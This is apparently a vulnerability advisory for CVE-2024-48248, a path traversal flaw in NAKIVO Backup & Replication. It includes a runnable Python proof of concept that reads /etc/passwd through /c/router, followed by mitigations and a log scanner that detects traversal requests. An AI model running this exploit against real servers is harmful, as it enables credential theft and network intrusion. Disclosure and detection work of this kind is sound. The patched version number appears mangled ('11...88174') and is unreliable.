A critical vulnerability has been discovered in NAKIVO Backup & Replication versions prior to 11...88174. It allows an attacker to perform absolute path traversal and read arbitrary files via the getImageByPath function in the /c/router module. Because the PhysicalDiscovery component stores credentials in cleartext, this can lead to remote code execution across an enterprise network. This article provides a detailed overview of the vulnerability, steps to reproduce the issue, and mitigation strategies to secure your environment.
Vulnerability Details
The vulnerability affects NAKIVO Backup & Replication versions prior to 11...88174. The issue resides in the getImageByPath function, which is part of the /c/router module. The function does not properly sanitize user input, allowing an attacker to pass an absolute path to the function, leading to unauthorized file access and potentially remote code execution.
Exploit Details
The exploit can be triggered by sending a specially crafted HTTP request to the NAKIVO Backup & Replication server containing the absolute path of the target file. For example, the following Python script can be used to read the content of the "/etc/passwd" file:
import requests

# Replace <target_ip> with the address of the NAKIVO Backup & Replication server
target_url = "https://<target_ip>/c/router"

# The "args" value is handed straight to getImageByPath, which does not confine
# it to the intended image directory, so the server reads the named file
payload = {
    "data": {
        "invoker": "get",
        "method": "getImageByPath",
        "args": "/../../../../../../../../etc/passwd"
    }
}

response = requests.post(target_url, json=payload)
print(response.content)
Replace <target_ip> with the IP address of the NAKIVO Backup & Replication server. Running this script will result in the server returning the contents of the "/etc/passwd" file.
Possible Impact
An attacker could exploit this vulnerability to read sensitive files on the server, such as configuration files containing cleartext credentials. This could lead to unauthorized access to resources across the enterprise network. In addition, remote code execution could be achieved if an attacker manages to read and modify specific files or upload malicious scripts to the server, further compromising the organization's security posture.
To mitigate the risks associated with CVE-2024-48248, it is recommended to:
1. Update NAKIVO Backup & Replication to the latest version (11...88174 or later). The patch for this vulnerability can be downloaded from the official NAKIVO website: https://www.nakivo.com/resources/download/update/
2. Monitor network traffic for any suspicious activity related to the /c/router module, especially for requests attempting file access outside the intended directory tree. Configuring a Web Application Firewall (WAF) to block such requests can further minimize the risk.
3. Limit access to the NAKIVO Backup & Replication interface to authorized personnel and implement strong authentication mechanisms, such as multi-factor authentication (MFA).
4. Ensure that the operating system and other software components running on the NAKIVO Backup & Replication server are up-to-date and properly secured, including applying the latest security patches and following best practices for hardening.
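As an added, defender-side example that is not part of the original advisory, the following Python scans constructed request-log lines for /c/router bodies that call getImageByPath with a path leaving the served directory, which is the pattern mitigation step 2 asks to monitor for. The log line format, the sample entries and ALLOWED_BASE (the directory the endpoint is meant to serve from) are assumptions; the real directory is product-specific and not given in the advisory.

```python
import json
import posixpath

# Assumed base directory the image endpoint is meant to serve from; the real
# directory is product-specific and not stated in the advisory.
ALLOWED_BASE = "/opt/nakivo/images"

# Constructed log lines of the shape '<client_ip> <uri> <json_body>'.
SAMPLE_LOG = [
    '10.0.0.5 /c/router {"data": {"invoker": "get", "method": "getImageByPath", "args": "/../../../../../../../../etc/passwd"}}',
    '10.0.0.7 /c/router {"data": {"invoker": "get", "method": "getImageByPath", "args": "thumbs/vm-01.png"}}',
    '10.0.0.9 /c/router {"data": {"invoker": "get", "method": "getImageByPath", "args": "../../../etc/passwd"}}',
    '10.0.0.9 /c/router {"data": {"invoker": "get", "method": "someOtherMethod", "args": "x"}}',
]


def resolve_request_path(args: str) -> str:
    """Resolve 'args' the way a naive server join would. An absolute 'args'
    makes posixpath.join discard ALLOWED_BASE entirely, which is the
    absolute-path traversal class CVE-2024-48248 belongs to."""
    return posixpath.normpath(posixpath.join(ALLOWED_BASE, args))


def is_suspicious_router_call(body: str) -> bool:
    """True when the body calls getImageByPath with a path that ends up
    outside ALLOWED_BASE after normalisation or carries '..' segments."""
    try:
        data = json.loads(body)["data"]
    except (ValueError, KeyError, TypeError):
        return False
    if not isinstance(data, dict) or data.get("method") != "getImageByPath":
        return False
    args = data.get("args")
    if not isinstance(args, str):
        return False
    resolved = resolve_request_path(args)
    inside = resolved == ALLOWED_BASE or resolved.startswith(ALLOWED_BASE + "/")
    return (not inside) or ".." in args.split("/")


def scan_log(lines):
    """Return [(line_no, resolved_path)] for every flagged /c/router request."""
    hits = []
    for n, line in enumerate(lines, 1):
        parts = line.split(" ", 2)
        if len(parts) != 3 or parts[1] != "/c/router":
            continue
        if is_suspicious_router_call(parts[2]):
            hits.append((n, resolve_request_path(json.loads(parts[2])["data"]["args"])))
    return hits
```

Only the two traversal requests are flagged; the in-directory thumbnail request and the unrelated method are passed over.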
Conclusion
The recent CVE-2024-48248 vulnerability in NAKIVO Backup & Replication highlights the importance of continuously monitoring and updating software applications to minimize the risk of security breaches. By promptly updating NAKIVO Backup & Replication and implementing the recommended mitigation strategies, organizations can effectively protect their environments from this and similar vulnerabilities.
Works Cited / Original References:
NAKIVO. (n.d.). NAKIVO Backup & Replication Update. https://www.nakivo.com/resources/download/update/
CVE. (n.d.). CVE-2024-48248 Detail. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-48248
Timeline
Published on: 03/04/2025 08:15:33 UTC
Last modified on: 03/25/2025 18:48:31 UTC